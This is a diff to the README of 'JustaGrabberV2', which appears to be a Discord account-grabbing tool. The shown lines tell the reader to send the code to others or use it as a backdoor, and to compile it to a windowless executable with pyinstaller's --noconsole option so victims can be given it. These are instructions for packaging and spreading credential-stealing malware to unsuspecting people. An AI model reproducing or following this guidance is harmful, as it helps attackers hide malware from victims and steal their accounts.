KLDiscord/JustaGrabberV2/README.md

 4. Send the code or use as backdoor.
 Or convert to exe then give to others

 ### ⚙・How to compile .py to .exe
-First, install pyinstaller using pip in cmd.
-Open cmd in the directory that the JustaGrabber.py is in then type :
+First, install pyinstaller using pip in cmd. ( pip install pyinstaller ) And you must have to check to 'Add python x.x.x to path' when you install Open cmd in the directory that the JustaGrabber.py is in then type :
 ```
 pyinstaller --onefile --clean --noconsole JustaGrabber.py